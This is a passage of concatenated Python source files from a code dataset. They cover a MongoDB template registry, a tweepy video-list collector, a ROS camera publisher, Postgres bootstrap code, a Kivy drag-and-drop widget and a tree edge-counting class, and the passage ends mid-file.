asset_uuid=found_asset[TemplateAssetField.UUID],\n filename=found_asset[TemplateAssetField.FILENAME],\n content_type=found_asset[TemplateAssetField.CONTENT_TYPE],\n data=file.read()\n )\n\n def asset_path(self, filename: str) -> str:\n return os.path.join(self.template_dir, filename)\n\n def store_file(self, filename, data, **kwargs):\n full_path = os.path.join(self.template_dir, filename)\n os.makedirs(os.path.dirname(full_path), exist_ok=True)\n with open(full_path, **kwargs) as f:\n f.write(data)\n\n def download_template_files(self):\n logging.info(f'Storing files of template {self.template_id} locally')\n for template_file in self.files:\n filename = template_file[TemplateFileField.FILENAME]\n data = template_file[TemplateFileField.CONTENT]\n self.store_file(filename, data, mode='w', encoding='utf-8')\n\n def download_template_assets(self):\n logging.info(f'Storing assets of template {self.template_id} locally')\n assets_fs = gridfs.GridFS(self.mongo_db, self.config.mongo.assets_fs_collection)\n for asset in self.metadata.get(TemplateField.ASSETS, []):\n filename = asset[TemplateAssetField.FILENAME]\n file = assets_fs.find_one({'filename': asset[TemplateAssetField.UUID]})\n if file is None:\n logging.error(f'Asset \"{TemplateAssetField.FILENAME}\" not found in GridFS')\n else:\n data = file.read()\n self.store_file(filename, data, mode='wb')\n\n def prepare_format(self, format_uuid: uuid.UUID) -> bool:\n str_uuid = str(format_uuid)\n for format_meta in self.metadata[TemplateField.FORMATS]:\n if str_uuid == format_meta[FormatField.UUID]:\n try:\n self.formats[format_uuid] = Format(self, format_meta)\n except Exception as e:\n logging.error(f'Format {str_uuid} of template {self.template_id} '\n f'cannot be loaded - {e}')\n return True\n return False\n\n def has_format(self, format_uuid: uuid.UUID) -> bool:\n return any(map(\n lambda f: f[FormatField.UUID] == format_uuid,\n self.metadata[TemplateField.FORMATS]\n ))\n\n def __getitem__(self, format_uuid: uuid.UUID) -> Format:\n return self.formats[format_uuid]\n\n def render(self, format_uuid: uuid.UUID, context: dict) -> DocumentFile:\n return self[format_uuid].execute(context)\n\n\nclass TemplateRegistry:\n\n def __init__(self, config, workdir):\n self.config = config\n self.workdir = workdir\n self.mongo_client = pymongo.MongoClient(**self.config.mongo.mongo_client_kwargs)\n self.mongo_db = self.mongo_client[self.config.mongo.database]\n self.mongo_collection = self.mongo_db[self.config.mongo.templates_collection]\n\n def get_template(self, template_id: str) -> typing.Optional[Template]:\n template_data = self.mongo_collection.find_one({TemplateField.ID: template_id})\n\n template_dir = os.path.join(self.workdir, template_id.replace(':', '_'))\n if os.path.exists(template_dir):\n shutil.rmtree(template_dir)\n os.mkdir(template_dir)\n\n return None if template_data is None else Template(\n self.config, template_dir, template_id, template_data, self.mongo_db\n )\n","sub_path":"document_worker/templates/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":6581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"199153860","text":"# -*- coding:utf-8 -*-\n\n# from fractions import Fraction\n# import random\n#\n# print(Fraction(4, 5))\n# print(Fraction(1, 2))\n# print(Fraction('0.5'))\n# print(7 * Fraction(0.5))\n#\n#\n# def password_generator(count_char=8):\n# arr = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\n# 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',\n# 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',\n# 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',\n# '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '_', '-', '+']\n# password = []\n# for i in range(count_char):\n# password.append(random.choice(arr))\n# return \"\".join(password)\n#\n#\n# print(password_generator(24))\n#\n# p = 'Python'\n# s = 'J' + p[1:]\n# print(p)\n# print(s)\n\nhtml = \"\"\"\n%(title)s\n\n

%(h1)s

\n
%(content)s
\n\n\n\"\"\"\n\narr = {\"title\": \"Название документа\",\n \"h1\": \"Заголовок документа\",\n \"content\": \"Контент документа\"}\n\nprint(html % arr)\ninput()\n","sub_path":"example5.py","file_name":"example5.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"130546893","text":"import os\r\nimport time\r\nimport json\r\nimport tweepy\r\nimport logging\r\nimport configparser\r\n\r\nclass USERLOG():\r\n def __init__(self,level=2,filename='log.txt'):\r\n self.logger = logging.getLogger(__name__)\r\n self.logger.setLevel(level=logging.INFO)\r\n handler = logging.FileHandler(filename)\r\n handler.setLevel(logging.INFO)\r\n handler.setFormatter(logging.Formatter('[%(asctime)s][%(levelname)s]: %(message)s'))\r\n self.logger.addHandler(handler)\r\n\r\nlog = USERLOG(filename=time.strftime('log_%Y-%m-%d_%H-%M.txt')).logger\r\n\r\nconfig = configparser.ConfigParser()\r\npath = os.path.split(os.path.realpath(__file__))[0] + '/config.ini'\r\nconfig.read(path)\r\n\r\nclass TweeVideo():\r\n def __init__(self):\r\n section = 'Twitter'\r\n consumer_key = config.get(section, 'consumer_key')\r\n consumer_secret = config.get(section, 'consumer_secret')\r\n access_token = config.get(section, 'access_token')\r\n access_token_secret = config.get(section, 'access_token_secret')\r\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\n auth.set_access_token(access_token, access_token_secret)\r\n self.tweepyapi = tweepy.API(auth, proxy=config.get('Requests', 'proxy'))\r\n self.threadList = []\r\n self.linkList = []\r\n def getUserVideoList(self, id):\r\n userVideoList = []\r\n for status in tweepy.Cursor(self.tweepyapi.user_timeline, id=id).items():\r\n try:\r\n url = status._json['extended_entities']['media'][0]['expanded_url'].split('/')[-3]\r\n if not (url in userVideoList):\r\n userVideoList.append(url)\r\n except:\r\n pass\r\n return userVideoList\r\n\r\ndef main():\r\n self = TweeVideo()\r\n tweeidList = []\r\n tweevideos = {}\r\n with open('tweeusers.txt', 'r') as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n line = line.strip('\\n')\r\n tweeidList.append(line)\r\n if len(tweeidList) == 0:\r\n log.error('获取本地用户名列表失败!')\r\n else:\r\n for tweeid in tweeidList:\r\n videos = self.getUserVideoList(tweeid)\r\n if len(videos) == 0:\r\n log.error('获取用户视频列表失败!')\r\n else:\r\n tweevideos[tweeid] = videos\r\n log.info('获取 ' + tweeid + ' 的原始视频列表成功!共 ' + str(len(videos)) + ' 条记录...')\r\n time.sleep(int(config.get('Requests', 'sleep')))\r\n with open('tweevideos.json', 'w') as f:\r\n json.dump(tweevideos, f)\r\n\r\nif __name__ == '__main__':\r\n try:\r\n main()\r\n except Exception as e:\r\n log.error(e)\r\n","sub_path":"tweevideos.py","file_name":"tweevideos.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"492612149","text":"#!/usr/bin/env python\n\nimport sys, time\nimport numpy as np\nimport cv2\n\nimport roslib\nimport rospy\n\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\n\n\nclass OpenCvCapture(object):\n def __init__(self):\n # capture from the LAST camera in the system\n # presumably, if the system has a built-in webcam it will be the first\n for i in reversed(range(10)):\n print(\"Testing for presense of camera #{}\".format(i))\n cv2_cap = cv2.VideoCapture(i)\n if cv2_cap.isOpened():\n break\n\n if not cv2_cap.isOpened():\n print(\"Camera not found!\")\n exit(1)\n\n self.cv2_cap = cv2_cap\n\n\ndef publish():\n image_pub = rospy.Publisher(\"/infrared\", Image)\n bridge = CvBridge()\n camera = OpenCvCapture()\n\n print(\"Running, ESC or Ctrl-c to exit...\")\n while not rospy.is_shutdown():\n ret, img = camera.cv2_cap.read()\n\n if ret == False:\n print(\"Error reading image\")\n break\n\n resized_image = cv2.resize(img, (640, 480))\n\n try:\n image_pub.publish(bridge.cv2_to_imgmsg(resized_image, \"bgr8\"))\n except CvBridgeError as e:\n print(e)\n\n\ndef main(args):\n rospy.init_node('sensors', anonymous=True)\n try:\n publish()\n except KeyboardInterrupt:\n print(\"Shutting down sensors.py node\")\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"nodes/sensors.py","file_name":"sensors.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"271576027","text":"import sys\nimport re\nimport random\nimport psycopg2\nimport logging\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy.sql import text\nfrom sqlalchemy import pool\n\nfrom findex_gui.bin.config import config\nfrom findex_gui.orm.models import BASE\nfrom findex_gui.bin.config import config\nfrom findex_common.exceptions import DatabaseException, ElasticSearchException\n\n\nclass Database(object):\n def __init__(self):\n \"\"\"Connects to the Postgres database.\"\"\"\n self.engine = None\n self.session = None\n self.dsn = config(\"findex:database:connection\")\n\n self.pool = pool.QueuePool(creator=self._getconn,\n max_overflow=1,\n pool_size=300,\n echo=False) # config(\"findex:findex:debug\")\n\n def connect(self, echo=None):\n if echo is None:\n echo = False # config(\"findex:findex:debug\")\n\n self.engine = create_engine(\"postgresql+psycopg2://\",\n pool=self.pool,\n echo=echo)\n self.session = scoped_session(sessionmaker(autocommit=False,\n autoflush=True,\n expire_on_commit=True,\n bind=self.engine))\n BASE.query = self.session.query_property()\n\n def bootstrap(self):\n # check necessary postgres extensions\n self.create_extension(\n extension=\"pg_trgm\",\n msg_on_activate_error=\"Postgres extension \\\"pg_trgm\\\" installed but \"\n \"could not be enabled, \"\n \"possibly missing administrator rights to enable \"\n \"pg_trgm: `CREATE EXTENSION pg_trgm;`\")\n if config(\"findex:elasticsearch:enabled\"):\n self.create_extension(\n extension=\"zombodb\",\n msg_on_activate_error=\"Postgres extension \\\"zombodb\\\" installed but \"\n \"could not be enabled.\")\n\n # create the tables, types and indexes\n BASE.metadata.create_all(bind=self.engine)\n\n if config(\"findex:elasticsearch:enabled\"):\n # check required types for es\n if not self.check_type(type_name=\"type_files\"):\n raise DatabaseException(\n \"Postgres type `type files` not found. \"\n \"Try the following SQL to rebuild the table:\\n\"\n \"\\tDROP TYPE type_files CASCADE;\\n\"\n \"\\tDROP TABLE files;\\n\"\n )\n # check if the zombodb index is present\n if not self.check_index(table_name=\"files\", index=\"idx_zdb_files\"):\n raise DatabaseException(\n \"Postgres index `idx_zdb_files` not found \"\n \"while ElasticSearch was enabled.\\n\"\n \"Try the following SQL to rebuild the table:\\n\"\n \"\\tDROP TYPE type_files CASCADE;\\n\"\n \"\\tDROP TABLE files;\\n\"\n )\n else:\n if self.check_index(table_name=\"files\", index=\"idx_zdb_files\"):\n raise DatabaseException(\n \"Please remove the index `idx_zdb_files` before \"\n \"using findex without ES enabled:\\n\"\n \"\\tDROP INDEX idx_zdb_files\\n\"\n \"\\tcurl -XDELETE db.schema.table.index\"\n )\n\n from findex_gui.controllers.user.user import UserController\n from findex_gui.controllers.user.roles import default_anon_roles\n from findex_gui.controllers.resources.resources import ResourceController\n\n # add some default users, groups and tasks to the database\n if not UserController.user_view(username=\"root\"):\n UserController.user_add(\n username=\"root\",\n password=config(\"findex:users:default_root_password\"),\n removeable=False,\n admin=True,\n skip_authorization=True)\n\n if not UserController.user_view(username=\"anon\"):\n UserController.user_add(\n username=\"anon\",\n password=config(\"findex:users:default_anon_password\"),\n privileges=default_anon_roles,\n removeable=False,\n skip_authorization=True)\n\n if not ResourceController.get_resource_group(name=\"Default\"):\n ResourceController.add_resource_group(\n name=\"Default\",\n description=\"Default group\",\n removable=False,\n skip_authorization=True,\n log_error=False,\n ignore_constraint_conflict=True)\n\n def check_index(self, table_name: str, index: str):\n \"\"\"\n Checks for the presence of a given Postgres index\n :param table_name: name of the table\n :param index: name of the index\n :return: A :class:`sqlalchemy.engine.result.RowProxy` instance.\n \"\"\"\n sql = \"\"\"\n SELECT schemaname, tablename, indexname, indexdef FROM pg_indexes\n WHERE tablename = :table_name AND indexname = :index;\"\"\"\n return self.session.execute(text(sql), params={\"table_name\": table_name, \"index\": index}).fetchone()\n\n def check_type(self, type_name: str):\n \"\"\"\n Checks for the presence of a given Postgres type\n :param type_name: name of the type\n :return: A :class:`sqlalchemy.engine.result.RowProxy` instance if found.\n \"\"\"\n sql = \"\"\"\n SELECT\n n.nspname AS schema,\n t.typname AS type\n FROM pg_type t\n LEFT JOIN pg_catalog.pg_namespace n ON n.oid = t.typnamespace\n WHERE (t.typrelid = 0 OR (SELECT c.relkind = 'c'\n FROM pg_catalog.pg_class c\n WHERE c.oid = t.typrelid))\n AND NOT EXISTS(SELECT 1\n FROM pg_catalog.pg_type el\n WHERE el.oid = t.typelem AND el.typarray = t.oid)\n AND n.nspname NOT IN ('pg_catalog', 'information_schema')\n AND t.typname=:type_name;\"\"\"\n return self.session.execute(text(sql), params={\"type_name\": type_name}).fetchone()\n\n def check_extension(self, extension: str):\n \"\"\"\n Checks for the presence of a given Postgres extension\n :param extension: name of the extension\n :return: A :class:`sqlalchemy.engine.result.RowProxy` instance if found.\n \"\"\"\n sql = \"\"\"\n SELECT name,installed_version FROM pg_available_extensions WHERE name=:extension\"\"\"\n return self.session.execute(text(sql), params={\"extension\": extension}).fetchone()\n\n def create_extension(self, extension: str, msg_on_activate_error: str):\n \"\"\"\n Tries to activate a Postgres extension\n :param extension: name of the Postgres extension\n :param msg_on_activate_error: exception message to raise when the\n extension could not be activated\n :return:\n \"\"\"\n extension = self.check_extension(extension)\n if not extension:\n raise DatabaseException(\"Postgres extension \\\"%s\\\" not installed\" % extension)\n\n if not extension.installed_version:\n try:\n self.session.execute(\"CREATE EXTENSION %s\" % re.sub(r'\\W+', '', extension.name))\n self.session.commit()\n self.session.flush()\n except Exception as ex:\n if \"permission denied\" in str(ex):\n sys.stderr.write(str(ex))\n sys.stderr.write(\"\\n\\nDatabase user not admin.\\n\\nSQL: ALTER USER myuser WITH SUPERUSER; \")\n sys.exit()\n raise Exception(ex)\n\n extension = self.check_extension(extension.name)\n if not extension:\n raise DatabaseException(\"Postgres extension \\\"%s\\\" not installed\" % extension)\n if not extension.installed_version:\n raise DatabaseException(msg_on_activate_error)\n else:\n logging.debug(\"Enabled database extension \\\"%s\\\"\" % extension)\n\n def _getconn(self):\n # random.shuffle(self.hosts)\n # for host in self.hosts:\n logging.info(\"connecting to: %s\" % self.dsn)\n try:\n return psycopg2.connect(self.dsn, connect_timeout=3)\n except psycopg2.OperationalError as e:\n print('Failed to connect to %s: %s' % (self.dsn, e))\n raise psycopg2.OperationalError(\"Ran out of database servers - exiting\")\n","sub_path":"findex_gui/orm/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":8768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"147024900","text":"import time\n\nfrom isolation import Board\n\nfrom sample_players import GreedyPlayer\n\nfrom game_agent import CustomPlayer\n\nplayer_1 = CustomPlayer()\n\nplayer_2 = GreedyPlayer()\n#player_2 = RandomPlayer()\n\nprint(player_1,player_2)\n\ntest_game = Board(player_1, player_2)\nstart = time.time()\nwinner, moves, reason = test_game.play()\nend = time.time()\n#print (winner)\nif reason == \"timeout\":\n print(\"Forfeit due to timeout.\")\nfor move in moves:\n print(move)\n\nprint('Play Summary : Time taken = {0}, number of move = {1}, winner= {2}, Reason ={3}' .format(end-start, len(moves),winner,reason))","sub_path":"play_game_wrapper.py","file_name":"play_game_wrapper.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"616554248","text":"#!/anaconda3/bin/python\n\nimport sys\n\nclass Solution(object):\n def longestValidParentheses(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n slen = len(s)\n flag = [0] * slen\n stack = []\n for i in range(slen):\n if s[i] == '(':\n stack.append(i)\n else:\n if stack:\n flag[stack.pop()] = 1\n flag[i] = 1\n maxlen = 0\n tmp = 0\n for i in range(slen):\n if flag[i] == 1:\n tmp += flag[i]\n maxlen = max(tmp, maxlen)\n else:\n tmp = 0\n return maxlen\n\nif __name__ == \"__main__\":\n a = Solution()\n s = \"())\"\n print(a.longestValidParentheses(s))\n\n \n\n","sub_path":"q32.py","file_name":"q32.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"409267439","text":"#\n# Copyright 2012, 2013, 2014, 2015, 2016 Pavel Kostelník\n# Copyright 2016 Michael Anthony Schwager\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# This is the DragNDropWidget class. It allows the Kivy programmer to\n# drag a widget from one container and drop it into another.\n\nfrom kivy.core.window import Window\nfrom kivy.animation import Animation\nimport copy\nfrom kivy.uix.widget import Widget\nfrom kivy.properties import (\n ListProperty, NumericProperty, BooleanProperty, ObjectProperty)\n\n\nclass DragNDropWidget(Widget):\n # let kivy take care of kwargs and get signals for free by using\n # properties\n droppable_zone_objects = ListProperty([])\n bound_zone_objects = ListProperty([])\n drag_opacity = NumericProperty(1.0)\n drop_func = ObjectProperty(None)\n drop_args = ListProperty([])\n failed_drop_func = ObjectProperty(None)\n failed_drop_args = ListProperty([])\n remove_on_drag = BooleanProperty(True)\n drop_ok_animation_time = NumericProperty(0.5)\n not_drop_ok_animation_time = NumericProperty(0.2)\n\n def __init__(self, **kw):\n super(DragNDropWidget, self).__init__(**kw)\n\n self.register_event_type(\"on_drag_start\")\n self.register_event_type(\"on_being_dragged\")\n self.register_event_type(\"on_drag_finish\")\n self.register_event_type(\"on_motion_over\")\n self.register_event_type(\"on_motion_out\")\n self._old_opacity = self.opacity\n self._drag_started = False\n self._dragged = False\n self._draggable = True\n self._fired_already = False\n self.copy = False\n self.touch_offset_x = 0\n self.touch_offset_y = 0\n self.drop_recipients = []\n self.am_touched = False\n if not self.drop_func:\n self.drop_func = self.drop_function\n\n def set_draggable(self, value):\n self._draggable = value\n\n def set_remove_on_drag(self, value):\n \"\"\"\n This function sets the property that determines whether the dragged widget is just\n copied from its parent or taken from its parent.\n @param value: either True or False. If True then the widget will disappear from its\n parent on drag, else the widget will just get copied for dragging\n \"\"\"\n self.remove_on_drag = value\n\n def set_drag_start_state(self):\n self._move_counter = 0\n self._old__opacity = self.opacity\n self.opacity = self.drag_opacity\n self.set_bound_axis_positions()\n self._old_drag_pos = self.pos\n self._old_parent = self.parent\n self._old_parent_children_reversed_list = self.parent.children[:]\n self._old_parent_children_reversed_list.reverse()\n if self.copy:\n self._old_index = -1\n else:\n self._old_index = self.parent.children.index(self)\n self._drag_started = True\n\n def set_drag_finish_state(self):\n self._drag_started = False\n self.opacity = self._old_opacity\n\n def set_bound_axis_positions(self):\n for obj in self.bound_zone_objects:\n try:\n if self.max_y < obj.y+obj.size[1]-self.size[1]:\n self.max_y = obj.y+obj.size[1]-self.size[1]\n except AttributeError:\n self.max_y = obj.y+obj.size[1]-self.size[1]\n try:\n if self.max_x < obj.x+obj.size[0]-self.size[0]:\n self.max_x = obj.x + obj.size[0]-self.size[0]\n except AttributeError:\n self.max_x = obj.x+obj.size[0]-self.size[0]\n try:\n if self.min_y > obj.y:\n self.min_y = obj.y\n except AttributeError:\n self.min_y = obj.y\n try:\n if self.min_x > obj.x:\n self.min_x = obj.x\n except AttributeError:\n self.min_x = obj.x\n\n def on_touch_down(self, touch):\n\n if self.collide_point(touch.x, touch.y) and self._draggable:\n # detect if the touch is short - has time and end (if not dispatch drag)\n if abs(touch.time_end - touch.time_start) > 0.2:\n self.touch_offset_x = touch.x - self.x\n self.touch_offset_y = touch.y - self.y\n self.am_touched = True\n\n def on_touch_up(self, touch):\n if self.am_touched:\n self.am_touched = False\n if self._draggable and self._dragged:\n self.short_touch = True\n self.touch_x = touch.x\n self.touch_y = touch.y\n self.dispatch(\"on_drag_finish\")\n self.short_touch = False\n else:\n self.opacity = self._old_opacity\n\n\n def on_touch_move(the_widget, touch):\n if the_widget.am_touched:\n if not the_widget._drag_started:\n the_widget.dispatch(\"on_drag_start\")\n the_widget.am_touched = False\n\n if not the_widget._drag_started:\n return\n the_widget._move_counter += 1\n if the_widget._draggable and the_widget._drag_started:\n # if the_widget._dragged and the_widget._draggable:\n the_widget._dragged = True\n x = touch.x - the_widget.touch_offset_x\n y = touch.y - the_widget.touch_offset_y\n\n try:\n if x <= the_widget.min_x:\n x = the_widget.min_x\n if x > the_widget.max_x:\n x = the_widget.max_x\n if y <= the_widget.min_y:\n y = the_widget.min_y\n if y > the_widget.max_y:\n y = the_widget.max_y\n except AttributeError:\n pass\n the_widget.pos = (x, y)\n # SPECIAL! Takes a herky-jerky GUI and makes it smoooooth....\n the_widget.canvas.ask_update()\n\n\n\n def easy_access_dnd(self, function_to_do, function_to_do_out, arguments = [], bind_functions = []):\n \"\"\"\n This function enables something that can be used instead of drag n drop\n @param function_to_do: function that is to be called when mouse_over event is fired on the widget\n @param bind_functions: what is really to be done - background function for GUI functionality\n \"\"\"\n Window.bind(mouse_pos=self.on_motion)\n self.easy_access_dnd_function = function_to_do\n self.easy_access_dnd_function_out = function_to_do_out\n self.easy_access_dnd_function_arguments = arguments\n self.easy_access_dnd_function_binds = bind_functions\n\n def on_motion(self, etype, moutionevent):\n if self.collide_point(Window.mouse_pos[0], Window.mouse_pos[1]):\n if not self._fired_already:\n self.dispatch(\"on_motion_over\")\n else:\n self.dispatch(\"on_motion_out\")\n\n def on_motion_over(self):\n self.easy_access_dnd_function(\n self.easy_access_dnd_function_arguments,\n self.easy_access_dnd_function_binds)\n\n self._fired_already = True\n\n def on_motion_out(self):\n try:\n self.easy_access_dnd_function_out()\n except AttributeError:\n pass\n self._fired_already = False\n\n def deepen_the_copy(self, copy_of_self):\n copy_of_self.copy = True\n copy_of_self.parent = self.parent\n copy_of_self.droppable_zone_objects = self.droppable_zone_objects\n copy_of_self.nbound_zone_objects = self.bound_zone_objects\n copy_of_self.drag_opacity = self.drag_opacity\n copy_of_self.drop_func = self.drop_func\n copy_of_self.drop_args = self.drop_args\n copy_of_self.failed_drop_func = self.failed_drop_func\n copy_of_self.failed_drop_args = self.failed_drop_args\n copy_of_self.remove_on_drag = self.remove_on_drag\n copy_of_self.drop_ok_animation_time = self.drop_ok_animation_time\n copy_of_self.not_drop_ok_animation_time = self.not_drop_ok_animation_time\n copy_of_self.touch_offset_x = self.touch_offset_x\n copy_of_self.touch_offset_y = self.touch_offset_y\n copy_of_self.drop_recipients = self.drop_recipients\n copy_of_self.droppable_zone_objects = self.droppable_zone_objects\n copy_of_self.bound_zone_objects = self.bound_zone_objects\n copy_of_self.drag_opacity = self.drag_opacity\n copy_of_self.drop_func = self.drop_func\n copy_of_self.remove_on_drag = self.remove_on_drag\n\n def on_drag_start(self):\n if self._drag_started:\n return\n # self._dragged = True\n if not self.remove_on_drag:\n #create copy of object to drag\n copy_of_self = copy.deepcopy(self)\n # We'll handle those variables that are common to ALL d-n-d\n # widgets. The widgets' classes can handle specifics\n # (such as text, etc.)\n self.deepen_the_copy(copy_of_self)\n\n copy_of_self.set_drag_start_state()\n copy_of_self.root_window = self.parent.get_root_window()\n ## the final child class MUST implement __deepcopy__\n ## IF self.remove_on_drag == False !!! In this case this is\n ## met in draggableArhellModelImage class\n # TODO: MIKE: it used to be that copy_of_self was added to _old_parent\n # self._old_parent.add_widget(copy_of_self, index=self._old_index)\n copy_of_self.root_parent(copy_of_self)\n copy_of_self.pos = self.pos\n else:\n self.set_drag_start_state()\n self.root_window = self.parent.get_root_window()\n self.root_parent(self)\n\n\n def on_drag_finish(self):\n # Don't worry, opacity will be properly set in set_drag_finish_state*)\n # after the animation\n self.opacity = 1.0\n del self.drop_recipients[:]\n if self._dragged and self._draggable:\n dropped_ok = False\n for obj in self.droppable_zone_objects:\n if obj.collide_point(self.touch_x, self.touch_y):\n self.drop_recipients.append(obj)\n if obj is self._old_parent:\n dropped_ok = False\n else:\n dropped_ok = True\n if dropped_ok:\n self.drop_func(*self.drop_args)\n for obj in self.drop_recipients:\n if \"drop_func\" in dir(obj):\n obj.drop_func(self)\n anim = Animation(opacity=0, duration=self.drop_ok_animation_time, t=\"in_quad\")\n anim.bind(on_complete=self.un_root_parent)\n anim.start(self)\n else:\n self.failed_drop_func(*self.failed_drop_args)\n anim = Animation(pos=self._old_drag_pos, duration=self.not_drop_ok_animation_time,\n t=\"in_quad\")\n if self.remove_on_drag:\n anim.bind(on_complete = self.reborn)\n else:\n anim.bind(on_complete = self.un_root_parent)\n anim.start(self)\n self._dragged = False\n self.set_drag_finish_state()\n\n def un_root_parent(self, widget=\"dumb\", anim=\"dumb2\"):\n self.get_root_window().remove_widget(self)\n\n def on_being_dragged(self):\n pass\n\n def reborn(self, widget, anim):\n self.un_root_parent()\n # BUG: We don't just add the reborn child to the parent.\n # Adding child in the first position (the highest index) fails due\n # to a bug in Kivy. We remove all remaining children and then re-add\n # the bunch (including the original child which was not dropped in a new\n # area).\n for childs in self._old_parent.children[:]:\n self._old_parent.remove_widget(childs)\n for childs in self._old_parent_children_reversed_list:\n self._old_parent.add_widget(childs)\n return\n #As of this moment, this code is unreachable- it's a placeholder.\n # See https://github.com/kivy/kivy/issues/4497\n self._old_parent.add_widget(self, index=self._old_index)\n\n def root_parent(self, widget):\n orig_size = widget.size\n if not self.remove_on_drag:\n self.root_window.add_widget(widget)\n return\n if widget.parent:\n parent = widget.parent\n parent.remove_widget(widget)\n parent.get_root_window().add_widget(widget)\n widget.size_hint = (None, None)\n widget.size = orig_size\n\n def drop_func(self, *args):\n pass\n","sub_path":"DragNDropWidget.py","file_name":"DragNDropWidget.py","file_ext":"py","file_size_in_byte":13012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"300452883","text":"from collections import Counter\nfrom itertools import combinations\nfrom typing import TypeVar\n\nfrom graph.UndirectedGraph import Graph\nfrom helpers.InputUtils import str_to_list\nfrom helpers.Utils import slide_window\n\nN = TypeVar('N')\nND = TypeVar('ND')\nE = TypeVar('E')\n\n\ndef create_tree(edges: list[list[str, str]]) -> Graph:\n g = Graph()\n for n in {n for e in edges for n in e}:\n g.insert_node(n)\n for n1, n2 in edges:\n g.insert_edge(f'{n1}-{n2}', n1, n2)\n return g\n\n\ndef find_nodes_between_leaves(g: Graph, n: N, end_n: N, n_walk: list[N]):\n n_walk.append(n)\n if n == end_n:\n return True\n for e in g.get_outputs(n):\n n1, n2, _ = g.get_edge(e)\n if len(n_walk) >= 2 and {n1, n2} == {n_walk[-1], n_walk[-2]}:\n continue\n next_n = next(iter({n1, n2}.difference({n})))\n done = find_nodes_between_leaves(g, next_n, end_n, n_walk)\n if done:\n return True\n n_walk.pop()\n\n\nclass EdgeCounter:\n def __init__(self, tree: Graph[N, ND, E, float]):\n self.tree = tree\n self.leaf_nodes = [n for n in tree.get_nodes() if len(tuple(tree.get_outputs(n))) == 1]\n self.leaf_count = len(self.leaf_nodes)\n\n def path(self, n: N, end_n: N) -> list[E]:\n edges = []\n nodes = []\n find_nodes_between_leaves(self.tree, n, end_n, nodes)\n for (n1, n2), _ in slide_window(nodes, 2):\n found_edge = None\n for edge_id in self.tree.get_outputs(n1):\n _end1, _end2, _ed = self.tree.get_edge(edge_id)\n if n2 not in {_end1, _end2}:\n continue\n if found_edge is not None:\n raise ValueError(f'Multiple edges to same node not allowed: {n1, n2}')\n found_edge = edge_id\n if found_edge is None:\n raise ValueError(f'No edge found: {n1, n2}')\n edges.append(found_edge)\n return edges\n\n # MARKDOWN_COUNT\n def edge_count(self, l1: N) -> Counter[E]:\n # Collect paths from l1 to all other leaf nodes\n path_collection = []\n for l2 in self.leaf_nodes:\n if l1 == l2:\n continue\n path = self.path(l1, l2)\n path_collection.append(path)\n # Count edges across all paths\n edge_counts = Counter()\n for path in path_collection:\n edge_counts.update(path)\n # Return edge counts\n return edge_counts\n # MARKDOWN_COUNT\n\n # MARKDOWN_COMBINE_COUNT\n def combine_edge_count(self, l1: N, l2: N) -> Counter[E]:\n c1 = self.edge_count(l1)\n c2 = self.edge_count(l2)\n return c1 + c2\n # MARKDOWN_COMBINE_COUNT\n\n # MARKDOWN_NORMALIZED_COMBINE_COUNT\n def combine_edge_count_and_normalize(self, l1: N, l2: N) -> Counter[E]:\n edge_counts = self.combine_edge_count(l1, l2)\n path_edges = self.path(l1, l2)\n for e in path_edges:\n edge_counts[e] -= self.leaf_count - 2\n return edge_counts\n # MARKDOWN_NORMALIZED_COMBINE_COUNT\n\n # MARKDOWN_NEIGHBOUR_PATH_EDGE_COUNT_CHECK\n def neighbour_check(self, l1: N, l2: N) -> bool:\n path_edges = self.path(l1, l2)\n return len(path_edges) == 2\n # MARKDOWN_NEIGHBOUR_PATH_EDGE_COUNT_CHECK\n\n # MARKDOWN_REDUCE_TO_2_TEST\n def reduced_to_2_check(self, l1: N, l2: N) -> bool:\n p = self.path(l1, l2)\n c = self.combine_edge_count_and_normalize(l1, l2)\n return all(c[edge] == 2 for edge in p) # if counts for all edges in p reduced to 2\n # MARKDOWN_REDUCE_TO_2_TEST\n\n # MARKDOWN_SEGREGATE_BY_EDGE\n def segregate_leaves(self, internal_edge: E) -> dict[N, N]:\n leaf_to_end = {} # leaf -> one of the ends of internal_edge\n e1, e2 = self.tree.get_edge_ends(internal_edge)\n for l1 in self.leaf_nodes:\n # If path from l1 